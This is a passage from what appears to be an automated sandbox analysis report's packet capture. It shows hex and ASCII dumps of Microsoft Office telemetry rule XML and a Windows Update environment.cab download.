                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:18 UTC16384INData Raw: 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: "0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" />
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:18 UTC16384INData Raw: 20 20 3c 53 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 53 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31
                                                                                                                                                                                                                                                                                                                                Data Ascii: <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-781
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:18 UTC16384INData Raw: 20 54 3d 22 55 36 34 22 20 49 3d 22 38 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 76 65 6e 74 73 5f 41 76 67 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32"
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:18 UTC16384INData Raw: 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f
                                                                                                                                                                                                                                                                                                                                Data Ascii: "0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Co
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:18 UTC16384INData Raw: 20 20 20 20 3c 53 20 54 3d 22 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C>
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:18 UTC16384INData Raw: 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63
                                                                                                                                                                                                                                                                                                                                Data Ascii: <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMillisec
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:19 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e
                                                                                                                                                                                                                                                                                                                                Data Ascii: R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIn
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:19 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L>
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:19 UTC16384INData Raw: 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                                                                                                                                                                                                                                                Data Ascii: T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                8192.168.2.5497314.175.87.197443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:18 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pK7CKmhVNkRmn+H&MD=nTznes85 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                                                                                Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:19 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                                                                                                MS-CorrelationId: c4af9427-cc8e-4db1-88a3-f1621bc551e0
                                                                                                                                                                                                                                                                                                                                MS-RequestId: 812bd422-3079-4efc-a72e-c97985172d3c
                                                                                                                                                                                                                                                                                                                                MS-CV: Hz0r5d1U+0GFtuB1.0
                                                                                                                                                                                                                                                                                                                                X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:18 GMT
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Length: 24490
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:19 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                                                                                                Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:19 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                                                                                                Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                9192.168.2.54974213.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:20 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:20 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:20 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 2980
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 455cb2eb-701e-005c-341c-29bb94000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210220Z-r197bdfb6b47gqdjvmbpfaf2d000000000wg00000000086e
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:20 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                10192.168.2.54974113.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:20 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:20 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:20 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 3788
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 5d69bbb7-d01e-008e-6d6a-27387a000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210220Z-17c5cb586f6w4mfs5xcmnrny6n000000075000000000dxv7
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:20 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                11192.168.2.54974413.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:20 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:20 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:20 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 2160
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: fc6998d3-101e-008d-52ad-2692e5000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210220Z-16849878b78hh85qc40uyr8sc800000005sg00000000sqh2
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:20 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
